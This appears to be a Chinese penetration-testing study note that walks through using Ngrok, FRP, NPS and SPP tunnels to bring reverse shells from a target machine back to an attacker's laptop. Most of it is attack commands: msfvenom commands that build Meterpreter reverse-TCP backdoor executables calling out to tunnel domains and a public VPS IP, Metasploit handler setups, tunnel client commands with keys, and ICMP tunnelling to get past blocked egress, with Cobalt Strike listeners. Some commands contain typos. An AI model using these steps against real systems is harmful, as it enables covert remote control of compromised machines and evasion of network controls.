笔记部分：

内网穿透与搭建隧道的区别：

假如我想从自己笔记本（大多数都是局域网，控制对方靶标内网计算机），有两种方法：

1.搭建隧道，控制对方出口网关，绕过目标内网协议实现本地上线。

2.本地电脑虚拟机实现上线攻击机----内网穿透，利用下面的工具

利用内网穿透可以实现：

1.可以直接将靶标反弹到本地计算机上，而不是反弹到公网服务器上，因为大多数人都是用本地计算机去渗透，而不是公网VPS。（CS可以实现将靶标权限反弹到公网服务器上，而不能反弹到内网自己的笔记本上。）

穿透：

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux：Proxychains

Windows：Sockscap Proxifier

穿透项目：Ngrok Frp Spp Nps EW(停更)

优点：穿透加密数据，中间平台，防追踪，解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm（停更，不在讲述） 

实验部分：

实验1：内网穿透--Ngrok--入门-上线

实验要求：要求其他地区内网能够映射到自己计算机中：

模拟实验环境：

要求虚拟机windows10可以反弹到本地计算机中

  官方网站：https://www.ngrok.cc/

支持的协议：tcp、http、https

支持的类型：正向代理、反向代理

1.服务端配置：

开通隧道-TCP协议-指向IP和端口--开通隧道--连接隧道

有很多服务器，选择免费的即可：

注意：隧道选择tcp（免费的隧道http以及https都会特别慢），隧道名称随便起，远程端口多试一下没占用的即可。本地端口选择想要反弹到的计算机上面（也就是自己本身计算机攻击机），端口选择未占用的。

2.客户端连接服务端：

根据自己攻击机操作系统选择对应的客户端下载（这里我的攻击机操作系统为windows）：

选择bat文件打开，

把红框内的命令复制上去即可，即可完成从攻击机到外网自己设置的域名的访问。

3.客户端生成后门配置监听：

msfvenom -p  windows/meterpreter/reverse_tcp

lhost=free.idcfengye.com（自己隧道的公网域名） lport=10199（自己设置的端口） -f exe -o tcp.exe

将tcp复制进自己的靶机中，

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0（监听本地）

set lport 8999（自己设置本地的端口）

run

至此，实验完成。

实验2：内网穿透-Frp-简易性-上线

实验环境与实验1相同，满足虚拟机windows可以通过VPS映射到本机https://github.com/fatedier/frp

frp是一个专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。

自行搭建，方便修改，成本低，使用多样化。

1.服务端-下载-解压-修改-启动（阿里云主机记得修改安全组配置出入口）

下载：

Release v0.61.0 · fatedier/frp

选择自己VPS的操作系统选择合适的压缩包，这里使用的是腾讯云的ubuntu虚拟机，下载红框范围内的。传入自己的VPS中并解压：

配置frps.toml:

• auth.method = “token” : 服务端连接身份认证，默认token。
• auth.token = “test123” : 服务端token密码，auth.method和auth.token要求frpc保持一致

• 下面4个都是frps在web上的一个仪表盘，可以可视化的显示frps和frpc的连接情况
  webServer.addr = “0.0.0.0” ： 访问web的ip
  webServer.port = 7500 ： 访问web的端口
  webServer.user = “xxxxx” ： 登录的用户名
  webServer.password = “xxxxxx” ： 登录的密码

保存并退出：

./frps  -c frps.toml

{如果想让frps在服务器后端执行，即关闭这个命令行窗口，也能继续运行，可以用

nohup ./frps -c ./frps.toml &

}

打开VPS:7500，输入账号密码：

即可完成配置。

2.控制端-下载-解压-修改-启动

控制端下载：

因为我的控制端为windows10，所以下载红框范围内的。

控制端修改配置文件frpc.toml:

[common]

server_addr=（VPS地址）

server_port-7000 #frpc工作端口，必须和上面frps保持一致

auth.method="token" 

auth.token="test123" #和前面服务端填写的保持一致。

[msf]        

name="test-tcp"

type=tcp

local_ip=127.0.0.1

local_port=5555    #转发给本机的5555

remote_port=6000  #服务端用6000端口转发给本机

启动客户端

frpc.exe -c frpc.toml

msfvenom -p windows/meterpreter/reverse_tcp lhost=(公网VPS IP)

lport=6000 -f exe -o frp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

ser LPORT 5555

run

3.靶机运行frp.exe即可上线：

实验完成。

注，由于最常用的内网穿透工具为frp和Ngrok，Spp和Nps的实验不再复现，仅作了解。

实验3：内网穿透-Nps-自定义--上线

https://github.com/ehang-io/nps

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、SSH访问、远程桌面，内网dns解析等等.....),此外还支持内网http代理、内网socks5代理，p2p等，并带有功能强大的web管理端。

-服务端：

1.启动

./nps  install

./nps

http://ip:8024/    admin/123

2.创建客户端，生成密钥

3.添加协议隧道，绑定指向

远程绑定5555，指向本地6666

-客户端：

1.连接服务端：

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v

2.生成后门：

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport =5555 -f exe -o nps.exe

3.监听后门：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LOST 0.0.0.0

set LPORT 6666

run

实验4：内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议：tcp、udp、udp、icmp、http、kcp、quic

支持的类型：正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到一些极端情况，比如目标封了Tcp，http等常用出网的协议，但是icmp，dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

1.服务端：监听本地的icmp数据

./spp -type server -proto ricmp -listen 0.0.0.0 

2.客户端：将本地8082给到117这个8081上（TCP封装icmp）

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr:8082 -toaddr:8081 -proxyproto tcp -proto ricmp

3.cs

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1  8082

生成后门:监听器2